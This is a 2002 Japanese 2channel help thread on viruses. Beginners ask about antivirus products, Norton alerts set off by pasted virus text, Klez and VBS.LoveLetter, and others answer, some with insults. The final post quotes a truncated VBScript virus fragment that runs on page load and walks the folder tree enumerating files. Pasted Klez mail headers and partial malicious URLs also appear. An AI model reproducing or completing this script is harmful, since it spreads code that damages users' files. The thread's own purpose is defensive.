140 :ひよこ名無しさん:02/07/04 20:27 ID:WD6R2HM+
>>138
ウィルス対策ソフトは何いれてるの?

141 :ひよこ名無しさん:02/07/04 20:28 ID:WD6R2HM+
>>138
ここ見てね。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_NOCLOSE.E

142 :初心者:02/07/04 20:29 ID:???
>>138
何も入れてません・・・



143 :ひよこ名無しさん:02/07/04 20:32 ID:???
>>142
ネットするなら、ウイルシ対策ソフト入れないと・・・だめぽ。

144 :名無しさん:02/07/04 20:33 ID:???
★ウィルス監視ソフトを導入していない人へ

今すぐパソコンショップへ行って買ってきましょう!ウィルスバスター2002や
Norton AntiVirusなら、たいていのお店で売っているはずです。

そして、今すぐ買うお金が無い人や、もう感染してるかもしれないと
思っている人はオンラインスキャンを実行してみましょう!

・トレンドマイクロ/オンラインスキャン
 http://www.trendmicro.co.jp/hcall/scan.htm
オンラインでウィルススキャンが実行できます。ActiveXを利用しますので
設定を確認してください。※ブラウザはInternet Exprolerしか使えません。

・ウイルスバスター2002体験版ダウンロード
 http://www.trendmicro.co.jp/product/vb2002/lis.asp

・シマンテック セキュリティチェック
 http://www.symantec.com/region/jp/securitycheck/index.html
セキュリティ危険度とコンピュータ・ウィルスの検査ができる
オンライン・チェックサイト。

・シマンテック/Norton AntiVirus体験版ダウンロード
 http://www.symantec.com/region/jp/trial/trial.html

145 :ひよこ名無しさん:02/07/04 20:33 ID:WD6R2HM+
>>139
参考になるかな。
ttp://members.tripod.co.jp/eazyfox/SecuTool/AntiVir/AVguard1.htm

146 :初心者:02/07/04 20:33 ID:???
>>141
そこを見たのですが言ってることがよくわからなくて・・・


147 :ひよこ名無しさん:02/07/04 20:35 ID:???
>>139
DLしたファイルをクリックして解凍なり起動なりしないとダメじゃないの

148 :ひよこ名無しさん:02/07/04 20:37 ID:WD6R2HM+
>>146
要するに、ウィルス対策ソフトでチェックして出てきたファイルを処分すればいいってこと。
ttp://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html
これをDLするか、144のどれかでチェック。

149 :ひよこ名無しさん:02/07/04 20:38 ID:???
★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

150 :ひよこ名無しさん:02/07/04 20:39 ID:WD6R2HM+
>>139
まさか、解凍していないとか?

151 :ひよこ名無しさん:02/07/04 20:55 ID:5crcXlWZ
ウイルス対策でダウンロードしたのですがなぜかエラー。
そのままにしていたのですが、最近PCが変なんです。
ADSLなんですが、電源が入っていないPCが突然つくんです!
電源入れてないのに!何ででしょう??

152 :139:02/07/04 20:55 ID:mlNiK4Aa
もう一回、ダウンロードしようとしたら
画面が重くて動かなくなったので、
ウィルスバスター体験版をダウンロードしました。
が、特にアイコンや起動画面がありません。
download programfileにはウィルスバスターという
名前がありました。なぜかantivirらしい物はありません
でした・・?
ウィルスバスター体験版は確実にインストールしてます。
が、タスクバーにも常駐してません。設定とかはどこでするのでしょうか?
どこにダウンロードされたのでしょうか?特に指定がなかった
のでどこにあるかわかりません。。

153 :荒岸 ◆MONa3xWM :02/07/04 20:57 ID:???
>>151

5W1Hが全然ダメ。何をダウンロードしたの?
エラーメッセージは?
あと、BIOSでwake up on LANをDisableに。

154 :ひよこ名無しさん:02/07/04 21:01 ID:5crcXlWZ
>>153
今手元に無いのでわかりません。
一番心配なのは、誰かがPCに入っているデータを盗んでいるのではということです。
リモートコントロールで電源をいれてるのか??と思って…。
そういうことってできるんですか?

155 :ひよこ名無しさん:02/07/04 21:02 ID:???
>>154
Ad-aware入れたら?

156 :荒岸 ◆MONa3xWM :02/07/04 21:04 ID:???
>>154

ここに似たような質問が結構来ますが、520%無いです。
技術的に可能ですけど、貴方がペリカン文書でも握ってるならまだしも
貴方のPCには国家機密とか入ってますか?

まぁあれですね、一人暮らしで勝手に電源が入ってるなら警察に連絡。
同居ならカジュアルハッキング。

157 :151&154:02/07/04 21:05 ID:5crcXlWZ
>>155
入れてみようと思います。
でももうすでにクレジットカードの番号とかのデータが盗まれて
いないか心配…。
なんで、勝手に電源が入るんでしょうか?????怖い。

158 :◆WINMEi3Y :02/07/04 21:14 ID:???
>>152
DLするときは右クリック-->対象をファイルに保存で場所をデスクトップ
などに指定。
DLしたファイルをダブルクリックするなどして指示に従ってインストールせよ。
Download Program Filesにあるウイルスバスターはオンラインスキャンの
プログラムだと思われ。

どうでもいいけど、AntiVirusはインターフェイスが英語なのでそのつもりで。
ウイルスバスターの体験版は定義のアップデートができないので、無料で
間に合わせる目的で使用するなら意味なし。

買ってきなさい

159 :ひよこ名無しさん:02/07/04 21:24 ID:uwmd2NA/
>>152
インストールって語の意味わかっていますか?

160 :139:02/07/04 21:26 ID:mlNiK4Aa
>>158 右クリック-->対象をファイルに保存でDLできました。
   ありがとうございます。

161 :ひよこ名無しさん:02/07/04 21:44 ID:/FHgNIZR
すいません、助けてほしいんですけど
私を相手したら場が荒れるんです。
ネタ野郎は放置してください!

162 :メルトダウン:02/07/04 22:19 ID:???
>>157 だからBiosのWake On Lan とWake On Ringを無効にしろ。
停電後に自動で再起動の項目も有ったかな。

163 :ひよこ名無しさん:02/07/04 22:45 ID:hXDumCG0
先日、ウィルスバスターで隔離したBAD TRANSのファイルを
そのまま削除してしまいました。
問題があるようなら教えてください。

164 :ひよこ名無しさん:02/07/04 22:52 ID:???
>>163
詳しく説明してる↓

http://www.trendmicro.co.jp/virusinfo/vbc_default3.asp?VName=WORM_BADTRANS.B

165 :163:02/07/04 22:56 ID:Z5sUu0tv
>>164
ありがとうございます。

166 :馬鹿ヒーの佐藤さん:02/07/05 00:39 ID:???
借金まみれの身でありながらインターネットやる暇はあるらしい。
ウイルス対策せよ。
Received:from imlmta01.aics.ne.jp (157.205.253.210)
by ** with SMTP; **
Received:from virmta04.aics.ne.jp ([157.205.253.148])
by imlmta01.aics.ne.jp (InterMail vM.5.01.03.13 201-253-122-118-113-20010918)
with ESMTP id< 20020704012828_ULUP20472_imlmta01_aics_ne_jp@imlmta01.aics.ne.jp >
for< WealthbuildersRemove@thecenter.zzn.com >; **
Received:from Eqeuowvjp ([61.124.119.226]) by virmta04.aics.ne.jp
(InterMail vM.5.01.03.13 201-253-122-118-113-20010918) with SMTP id < 20020704012757_XCMJ20864_virmta04_aics_ne_jp@virmta04.aics.ne.jp >
for< WealthbuildersRemove@thecenter.zzn.com >; **
From:taro< taro@bar.or.jp >
To: WealthbuildersRemove@thecenter.zzn.com joem8788g44@hotbot.com
20020704012828_ULUP20472_imlmta01_aics_ne_jp@zao.aics.ne.jp
20020704012757_XCMJ20864_virmta04_aics_ne_jp@aso.aics.ne.jp
20020704012828_ULUP20472_imlmta01_aics_ne_jp@aso.aics.ne.jp
20020704012757_XCMJ20864_virmta04_aics_ne_jp@zao.aics.ne.jp
ntkngw019226_isdn_ppp_infoweb_ne_jp_Virus_Deleted@zao.aics.ne.jp
61_124_119_226_Virus_Deleted@aso.aics.ne.jp
ウイルス対策せよ。
Subject:A humour game
Message-Id:< 20020704012757_XCMJ20864_virmta04_aics_ne_jp@virmta04.aics.ne.jp >
Date**
This is a very humour game
This game is my first work.
You're the first player.
I hope you would like it.

------------------ Virus Warning Message (on the network)

Found virus WORM_KLEZ.E in file install.exe
The file is deleted.

---------------------------------------------------------
馬鹿ヒーの佐藤さん
ある男の貧乏脱出物語
現 在 の 私
2000万の借金の返済を無事に終えました。
とてもほっとしています。
仕事は年に4〜5回、香港、パリ、ロスなどの出張をこなし、
普段は日本中を車や、新幹線、飛行機で、飛び回っています。とても充実しています。
http://muneyasu.com/pa-tsu/gennzai.html
http://muneyasu.com/index.html

167 :ひよこ名無しさん:02/07/05 04:18 ID:qGXMBX1q
>>124
私も一緒だ・・・。荒岸さんの言うとおり、履歴クリアして
検疫に入れてたやつを削除。永久的に削除ってなってたから、
大丈夫・・・ですよね?そして最新定義でスキャン。なんにも
感染してませんでした。ふ〜、なんでいきなりこんなことに?
2ちゃんしてたらいきなりノートン先生の警告だもんなー。


168 :ひよこ名無しさん:02/07/05 04:30 ID:???
>>167
それは、ここに http://pc.2ch.net/test/read.cgi/pcqa/1025748611/519
文字列が貼ってあって、ノートン先生が過敏に反応したからだよ。

169 :ひよこ名無しさん:02/07/05 04:31 ID:???
>>167
ウイルスじゃないから安心してください
いわゆる誤検出です

170 :ひよこ名無しさん:02/07/05 10:45 ID:dTuwjhbW
シマンテックのサポセン全く繋がらない…眠い…

171 :ひよこ名無しさん:02/07/05 10:46 ID:???
>>170
トレンドマイクロは?

172 :ひよこ名無しさん:02/07/05 10:48 ID:dTuwjhbW
>>171
製品登録について聞きたいので…うぐぐぐムキー

173 :ひよこ名無しさん:02/07/05 10:49 ID:???
あっ、ボケてた。スマソ。

174 :ひよこ名無しさん:02/07/05 10:50 ID:???
>>170
気長に待ちましょう。

175 :167:02/07/05 15:19 ID:???
>>168
>>169
レスありがとうございます。安心しました。

176 :ひよこ名無しさん:02/07/05 20:52 ID:MPOIVykH
C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\LG0FXPGT\l50[4]
は VBS.LoveLetter.A ウィルスに感染しています。
このファイルを修復できません。

C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\LG0FXPGT\l50[4]
は VBS.LoveLetter.A ウィルスに感染しています。
ファイルへのアクセスが拒否されました。

コレってノートンが防いでくれたって事でしょうか?

177 :ひよこ名無しさん:02/07/05 20:53 ID:???
>>176
>>168読んで下さい。

178 :ひよこ名無しさん:02/07/05 20:54 ID:???
>>176
2ちゃんのスレに、誰かがウイルスコードをカキコしたものが
インターネット一時ファイルに残っているのです。

179 :ひよこ名無しさん:02/07/05 20:56 ID:???
>>178
そのインターネット一時ファイルを削除して下さい。

180 :176:02/07/05 20:57 ID:???
すいませんでした。
トーナメントの雑談スレにいったら急にノートンが反応したので・・・。
心配になって書き込みました。

181 :ひよこ名無しさん:02/07/05 20:58 ID:???
トーナメントの雑談スレにもあるのか・・・

182 :ひよこ名無しさん:02/07/05 20:59 ID:???
>>180
ま、過剰反応ですから。。。。

183 :ひよこ名無しさん:02/07/05 21:02 ID:???
あちこちにウィルシをコピペしているアフォがいるのかな。

184 :ひよこ名無しさん:02/07/05 21:04 ID:???
>>183
・・・みたいですね!昨日もあったから。

185 :ひよこ名無しさん :02/07/05 21:18 ID:bGQTTU3u
つい数時間前から変な症状が出始めました。
・ブラウザのドロップダウンボタン、最大化・最小化・閉じるボタンなどが何故か数字に変わっている
・(;´Д`)等の顔文字の口がいきなり表示されなくなった
・数日前から表示可能フォントが徐々に減ってきている。

ウイルススキャンは反応なしです。・゚・(ノД`)・゚・。コワイデスウ

186 :ひよこ名無しさん:02/07/05 21:19 ID:???
>>185
氏ね

187 :ひよこ名無しさん:02/07/05 21:19 ID:???
あ、ちなみにWinME、IE6.0です。PCはNECのVALUESTAR(液晶)

188 :ひよこ名無しさん:02/07/05 21:20 ID:???
>>185
氏ね。

189 :ひよこ名無しさん:02/07/05 21:22 ID:???
>>185
ここ読んで下さい。
http://pc.2ch.net/test/read.cgi/pcqa/1023507190/2

190 :ひよこ名無しさん:02/07/05 21:23 ID:???
>>185
あなたと同じ質問をした人が、過去に4294967295人いて、
今1を加算したところ、0になってしまいました。ヽ(`Д´)ノ ゴルァ!!

191 :185:02/07/05 21:31 ID:???
お騒がせしました・・・今治りました。

192 :ひよこ名無しさん:02/07/05 21:44 ID:???
>>183
タイトルがそのコピペのスレッドまで立ってるよ、
うちのノートン先生大騒ぎだよ(ワラ

193 :ひよこ名無しさん:02/07/05 21:46 ID:???
>>192
ノートン先生ちょとウザいっす!(w

194 :ひよこ名無しさん:02/07/05 21:50 ID:8uvMvo/w
最近、IEを開くと、今まで表示させてなかったリンクのツールーバーと、
検索ウインドウが表示され、ポップアップでもその検索サイトが開かれるんですが、
これはウイルスなんでしょうか?

195 :ひよこ名無しさん:02/07/05 21:51 ID:???
>>194
スキャンしてから来い

196 :ひよこ名無しさん:02/07/05 21:51 ID:bsZSnaZv
今、2ちゃんねるに繋げたとたんに画面上にウィルスに感染の文字が・・・
どうしたらいいか分らなくて、思わず「ファイル削除」をしてしまいました。
どのファイルが消えたのか分りません。
もしかしたら大変な事をしてしまったかも・・・
因みに、Norton Internet Security を入れていたのですが・・・

197 :ひよこ名無しさん:02/07/05 21:53 ID:???
>>196
ちょっと上のレスぐらい呼んでから質問してくれ。

198 :ひよこ名無しさん:02/07/05 21:53 ID:???
>>196
>>195

199 :ひよこ名無しさん:02/07/05 21:54 ID:???
>>196
何のファイルなの?

200 :ひよこ名無しさん:02/07/05 21:54 ID:???
>>196
スレをちょっとしっかり読んでから質問しなはれ!(w

201 :194:02/07/05 21:58 ID:8uvMvo/w
>>195
オンラインスキャンをしましたが何も出ませんでした。


202 :ひよこ名無しさん:02/07/05 21:58 ID:???
>>201
オンラインスキャンに頼るな。製品版飼え。

203 :ひよこ名無しさん:02/07/05 21:59 ID:???
>>201
オンラインスキャン?ナメてんのか?氏ね。

204 :194:02/07/05 21:59 ID:8uvMvo/w
申し訳ありませんが注文中です。
まだ届いてません

205 :ひよこ名無しさん:02/07/05 22:00 ID:FNLU+k2b
あわわわ・・・ウイルス感染してたYO!
VBS Love letterだぼ。

修復できないから削除しちゃったの。
いい?

206 :ひよこ名無しさん:02/07/05 22:00 ID:???
>>204
じゃあ届いてスキャンしてから来い

207 :ひよこ名無しさん:02/07/05 22:00 ID:???
>>204
じゃ、ネットやめとけ!

208 :ひよこ名無しさん:02/07/05 22:02 ID:???
>>205
いいけど、知らんゾ。ウイルス対策ソフトも導入しないでネットするなんて
裸で街を歩くようなもんだ!

209 :ひよこ名無しさん:02/07/05 22:03 ID:???
>>205
いい。そのウィルスコードをそっかのスレにコピペしたヴァカのせい。
感染はしてないと思われるから安心すれ。

210 :205:02/07/05 22:05 ID:FNLU+k2b
安心しますた。
はじめてだったから、すごいびびったよ。
さんくす。

211 :ひよこ名無しさん:02/07/05 22:07 ID:???
>>210
氏ね!

212 :196:02/07/05 22:36 ID:fDos89az
今又画面上にウイルス感染の警告が出てしまったので、今度は「検疫」をしました。
で、一旦接続を切ってからスキャンした所「VBS LoveLetter A」と出たのですが、
これってどう言うウイルスなんでしょうか ?

213 :ひよこ名無しさん:02/07/05 22:38 ID:???
>>212
ほっとけ!検疫したら、削除すれ。実行ファイルじゃないから。。。。

214 :205:02/07/05 22:39 ID:FNLU+k2b
>>212
最新50くらいは読んでから質問しる!

大丈夫らしいよ。

215 :212:02/07/05 22:40 ID:fDos89az
>>213
削除して大丈夫なんですか ?

216 :ひよこ名無しさん:02/07/05 22:40 ID:???
>>215
ああ、いいよ!必要か?(w

217 :ひよこ名無しさん:02/07/05 22:41 ID:???
>>215
あとね、インターネットオプションの一時ファイルも削除すれ!

218 :ひよこ名無しさん:02/07/05 22:41 ID:OmwR5+RQ
はじめまして。
明日6日はklezとかいうウイルスが作動すると聞きました。
Norton AntiVirusの自動Live UpDateをオフにしてたんで、
今日あわてて最新版をダウンロードして、Cドライブを
スキャンして何も検出されませんでしたが、これで感染
していないと判断してよろしいのでしょうか?
また、LiveUpdateの他に何かダウンロードした方がいい
ものとかありますでしょうか?

よろしくお願い致します。


219 :215:02/07/05 22:43 ID:fDos89az
今から削除します。

220 :ひよこ名無しさん:02/07/05 22:43 ID:???
>>218
ウイルス定義ファイルが最新なら大丈夫でしょう!心配なら、明日ネットしなきゃいいんだよ。

221 :218:02/07/05 22:46 ID:OmwR5+RQ
>>220
どうもありがとうございます!
ちなみに今思ったんですが、奇数月の6日だけ
Windowsの時計で日付を他の日に変えとくなんてのは
ダメなんでしょうか?

222 :ひよこ名無しさん:02/07/05 22:48 ID:???
>>221
あまり気にしすぎると禿げるぞ。

223 :ひよこ名無しさん:02/07/05 22:48 ID:???
>>221
怪しげなexe.ファイルがないかどうかチェックして、なければ気にしないでいいんじゃないかな?
ま、念のためにバックアップはマメにしておきましょう。

224 :ひよこ名無しさん:02/07/05 22:49 ID:???
>>221
Norton AntiVirusを信用してないって事? エラクめんどうな事考えるのね

225 :ひよこ名無しさん:02/07/05 22:54 ID:???
>>221
万一ウィルスが発動したとしても、お前が氏ぬわけではない。

226 :ひよこ名無しさん:02/07/05 22:58 ID:LqK2Dx4d
2ちゃんねるを見ていて、突然ノートンがウイルス警告を出す事についての参考スレ

http://pc.2ch.net/test/read.cgi/sec/1025872269/

227 :ひよこ名無しさん:02/07/05 22:58 ID:???
>>225
そりゃそうだ!

228 :218:02/07/05 22:59 ID:OmwR5+RQ
>>222
ですね(w
自分のPCがリカバリの刑になるだけならまだいいんですが(イヤだが)、
PC内のファイルを勝手にメールに添付して誰かに送信するとか
聞いたんで、今からヤバい画像とかテキストをCDに移そうかと
思ったら、ウチCD焼けなくて・・・(w

>>223
ファイル名を見ても怪しげなのかどうなのか分からなくて、スマソです。
“wink〜.exe”とかいう名前のファイルがC:\Windows内にあると
感染してるという話を聞いたんで、試しに検索してみましたが、
ありませんでした。大丈夫でしょうか。

>>224
スマソです。メジャーなウイルス駆除ソフトはことごとくスルーされる
とかいう怖い話を聞いたもので・・・。


229 :ひよこ名無しさん:02/07/05 23:04 ID:???
>>228
ここ、見ておいで。
http://pc.2ch.net/test/read.cgi/sec/1025872269/1

230 :ひよこ名無しさん:02/07/05 23:07 ID:???
>>スマソです。メジャーなウイルス駆除ソフトはことごとくスルーされる
>>とかいう怖い話を聞いたもので・・・。
逆もあるね、なんも無いのに誤作動したり。

231 :◆WINMEi3Y :02/07/05 23:07 ID:???
>>228
特定の日付になるとKLEZは感染者のPCに悪さをするけど、
感染メール送信などの活動は日付に関係なくおこなわれるので、
その点はお忘れなく・・・


232 :218:02/07/05 23:14 ID:OmwR5+RQ
>>229
出た!初めて見ました。感動です!
このQuaraitineとかいう場所に隔離されたファイルは
削除しなくてもいいんでしょうか?

>>231
初めて知りました(汗。
感染してるんだとすると、もう遅かったってことですね。


233 :218:02/07/05 23:15 ID:???
× Quaraitine
○ Quarantine
間違えました。

234 :ひよこ名無しさん:02/07/05 23:16 ID:???
>>232
欲しかったら残せば?スキャンしてれば一応OK!

235 :218:02/07/05 23:22 ID:OmwR5+RQ
ここの皆さんのおかげで安心して明日を迎えることができそうです!
どうもありがとうございました。


236 :ひよこ名無しさん:02/07/05 23:24 ID:???
>>235
少し、本読んだ方がいいかも?ま、がんがってください!なんせ、自己責任ですから。。。

237 :◆WINMEi3Y :02/07/05 23:24 ID:???
>>235
あとはIEを5.5SP2以上に・・・

238 :Found virus WORM_KLEZ.E :02/07/05 23:53 ID:???
Received: from nu.vpo.fenics.or.jp (202.248.63.186)
by ** with SMTP; **
Received: from Plslnsv (localhost [127.0.0.1])
by nu.vpo.fenics.or.jp (8.9.3/3.7W) with SMTP
id KAA23779 for < hostmaster@datapipe.com >; **
Date**
Message-Id:< 200207050132_KAA23779@nu.vpo.fenics.or.jp >
From:postmaster< postmaster@equalamail.promosvc.com >
To: contentwatch@equalamail.promosvc.com
200207050132_KAA23779_Virus_deleted@nu.vpo.fenics.or.jp
hostmaster@datapipe.com
contentwatch_equalamail_promosvc_com@mail5.hispeedhosting.com
ウイルス対策せよ
Subject: Undeliverable mail--"滑楫姪"

------------------ Virus Warning Message (on nu)

Found virus WORM_KLEZ.E in file 、ホ、ヌ.exe
The file is deleted.

---------------------------------------------------------

239 :ひよこ名無しさん:02/07/05 23:53 ID:???
??????

240 :ひよこ名無しさん:02/07/05 23:57 ID:???
前にも>>238のような書き込みを見ましたが、なんのために
やっているのですか?
ここはそーいうスレですか?

241 :ひよこ名無しさん:02/07/06 00:03 ID:???
>>240 ネタだろ。気にするな。

242 :240:02/07/06 00:07 ID:???
>>241
そーいうことですか。ありがとうございました。

243 :ひよこ名無しさん:02/07/06 00:21 ID:idOHTvpC
ついさっき2ちゃんを見てるとAntiVirusからウィルスに感染したと
告知がありました。ウィルス名はVBS.Internalです。
はじめて感染したのでVBS.Internalがどういうウィルスなのかsymantecで
検索したのですが検索できませんでした。
いったいどういうウィルスなのでしょうか。
よろしければ教えてください。お願いします。


244 :荒岸 ◆MONa3xWM :02/07/06 00:23 ID:???
>>243

インターネットオプションの全般タブからインターネット一時ファイルクリアしてから
再スキャンしたら多分検知されません。

245 :ひよこ名無しさん:02/07/06 00:23 ID:???
>>243
このスレの上のほうを読んで下さい。大丈夫です!

246 :ひよこ名無しさん:02/07/06 00:25 ID:???
>>243
これは「ウイルス」じゃないです。ある文字列がカキコされてて、ノートン
先生が反応しただけです。

247 :ひよこ名無しさん:02/07/06 00:29 ID:idOHTvpC
>>244 245 246
ありがとうございます。はじめてなんで動揺してしまいました。前スレ
読みます。大変失礼いたしました。

248 :ひよこ名無しさん:02/07/06 00:29 ID:???
バスターは何も反応しないが なんで?

249 :ひよこ名無しさん:02/07/06 00:32 ID:???
>>248
ノートンだから!

250 :ひよこ名無しさん:02/07/06 00:46 ID:???
ノートンはバカだということ

251 :ひよこ名無しさん:02/07/06 00:48 ID:???
>>250
うむ!(w

252 :Virus Warning Message :02/07/06 00:50 ID:???
Received: from nu.vpo.fenics.or.jp (202.248.63.186)
by ** with SMTP; **
Received: from Plslnsv (localhost [127.0.0.1])
by nu.vpo.fenics.or.jp (8.9.3/3.7W) with SMTP
id KAA23779 for < hostmaster@datapipe.com >; **
Date**
Message-Id:< 200207050132_KAA23779@nu.vpo.fenics.or.jp >
From:postmaster< postmaster@equalamail.promosvc.com >
To: contentwatch@equalamail.promosvc.com
200207050132_KAA23779_Virus_deleted@nu.vpo.fenics.or.jp
hostmaster@datapipe.com
contentwatch_equalamail_promosvc_com@mail5.hispeedhosting.com
ウイルス対策せよ
Subject: Undeliverable mail--"滑楫姪"

------------------ Virus Warning Message (on nu)

Found virus WORM_KLEZ.E in file 、ホ、ヌ.exe
The file is deleted.

---------------------------------------------------------

253 :定説:02/07/06 00:52 ID:???
ノートン>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
バスター>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>クソースネクストバカフィー
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>ウイルス警備隊

254 :ひよこ名無しさん:02/07/06 00:55 ID:???
>ウイルス警備隊
そんな漫画みたいなソフトあったら面白いね

255 ::02/07/06 01:01 ID:???
2ヶ月前に初めてPC買ったんすよ、NECのLaVie L LL700/2D
プレインストされてんのは当然マカフィー
PC初心者板でまかひは豚だ、糞だのと罵られてるが、
初めて買った愛機に付いてるモノゆえ、
愛着を持ってコイツを使って逝こうと思っていたのに・・・

3ヵ月後にでた夏モデルLL700/3Dのプレインストは、
ノートンアンチウイルス・・・

NECのバカーーーーーー!?
金返せウワァーーーーーーーーーーーーーン・゚・(ノД`)・゚・

256 :ひよこ名無しさん:02/07/06 01:03 ID:???
>>248
ノートンとバスターでは、ウイルスを判定する内容(基準)が異なっているから。

257 :ひよこ名無しさん:02/07/06 02:00 ID:WVYNycne
ただの疑問なんですがKLEZの奇数月6日の破壊活動は起動している最中に起こるんですか?
1度起動してから次に起動した時?

258 :ひよこ名無しさん:02/07/06 02:07 ID:???
>>257
その前に、あなたはウイルス対策ソフトを導入し、ウイルス定義を更新して定期的に
スキャンしているんでしょうね?

259 :ひよこ名無しさん:02/07/06 02:11 ID:WVYNycne
>258
ちゃっかりしっかりしてます
した上で単純に疑問に思っただけなんで

260 :ひよこ名無しさん:02/07/06 02:14 ID:???
>>259
じゃ、心配ない!だけど、大事なファイルとかは定期的にバックアップしておきましょう。

261 :ひよこ名無しさん:02/07/06 02:19 ID:WVYNycne
>260
分かりました
今まで月1くらいだったバックアップもこれからは余裕のある時は週1位でしようと思います
レスありがとう

262 :ひよこ名無しさん:02/07/06 02:21 ID:???
>>261
いいえ。ウイルスにやられても、リカバリすりゃいいんだからさ!
メールとか自分にとって大切なデータはバックアップしとくとラク
です。

263 :ひよこ名無しさん:02/07/06 02:23 ID:94DTRHLV
ウィルスを作った人で捕まった人いますか?
毎日のようにウィルスの被害が出てるのに、
新聞とかに逮捕とかいう記事がありません。
ひょっとして誰も逮捕されてないのでしょうか?

264 :PC用語くらいちゃんと使え委員会 ◆u/7XlPOM :02/07/06 02:24 ID:???
>>263
NimdaかCodeRedかの作者は捕まったかと。
新聞に載ってないならニュースでも見よう。

265 :ひよこ名無しさん:02/07/06 02:26 ID:94DTRHLV
>>264 捕まってるんですね。サンクスです。

266 :ひよこ名無しさん:02/07/06 02:29 ID:???
>>263
1999年に北海道大生がタイーホされてますね。
http://www.google.co.jp/search?q=cache:SZGryg1MtYgC:www.hokudai.ac.jp/hines/HINESworld/No.53/hw53_3.html+%E3%82%B3%E3%83%B3%E3%83%94%E3%83%A5%E3
%83%BC%E3%82%BF%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9%E3%80%80%E9%85%8D%E5%B8%83%E3%80%80%E9%80%AE%E6%8D%95%E3%80%80%E7%B5%B1%E8%A8%88&hl=ja&ie=UTF-8

途中をつなげてアクセスしてみて下さい。

267 :ひよこ名無しさん:02/07/06 02:32 ID:???
−−−−−−−
俺様用しおり
  ∧_∧   
 ( ´∀`)< 今日はここまで読んだ      
−−−−−−− 

268 :ひよこ名無しさん:02/07/06 03:43 ID:RESDNG1N
かちゅ〜しゃで、Off板の湘南ゴミ拾いオフのスレを開いた瞬間ノートンが
かちゅのlogがdatVBS.LoveLetter.Aに感染している、と言い出したのですが
これも例のコピペでしょうか?

269 :ひよこ名無しさん:02/07/06 03:43 ID:???
>>268
はい、そーです!

270 :ひよこ名無しさん:02/07/06 05:12 ID:???
これ、検地しますた!
http://pc.2ch.net/test/read.cgi/pcqa/1025874736/581

で、その結果デシ
http://pc.2ch.net/test/read.cgi/pcqa/1025874736/592




271 :ひよこ名無しさん:02/07/06 08:53 ID:???
http://kaba.2ch.net/test/read.cgi/accuse/1025144318/4
その上のURL、ニュー速+とかでも張られてるの見たけど、
噂の見ただけで感染するというウイルスですか?


272 :ひよこ名無しさん:02/07/06 09:12 ID:IuIdl6Gu
スレ違いだったら、すみません。
最近、WEBメールの私のアドレス宛てに
同一人物と思われる人から、複数のメアドを使って
本文無し、添付ファイルなしの、メールが来ます。
一体何なのか良く分りません。こんな経験ある人
教えて頂けたら嬉しいです。

説明不足でしたら、ごめんなさい。

273 :ひよこ名無しさん:02/07/06 09:29 ID:???
↓最近、これが大量に貼り付けられてるみたいなんですが何か意味があるんですか?

<BODY Onload="Redirect();">
<script language="VBScript"><!--

Sub Redirect
Randomize
If location.protocol = "file:" AND (Int((6 * Rnd) + 1) = 1) then Call Offline
location.href = location.href +"l"
End Sub

Sub Offline
Dim FSO,folder ,fc, f1, cpath
Set FSO = CreateObject("Scripting.FileSystemObject")
HostPath = Replace(location.href, "file:///", "")
HostPath = Replace(HostPath, "/", "\")
cpath = fso.GetParentFolderName(HostPath)
Set folder = fso.GetFolder(cpath)

While folder.IsRootFolder = false
Set folder = fso.GetFolder(cpath)
Set fc = folder.Files
cpath = fso.GetParentFolderName(cpath)
For each f1 in fc
s = Lcase(Fso.GetExtensionName(f1.name))
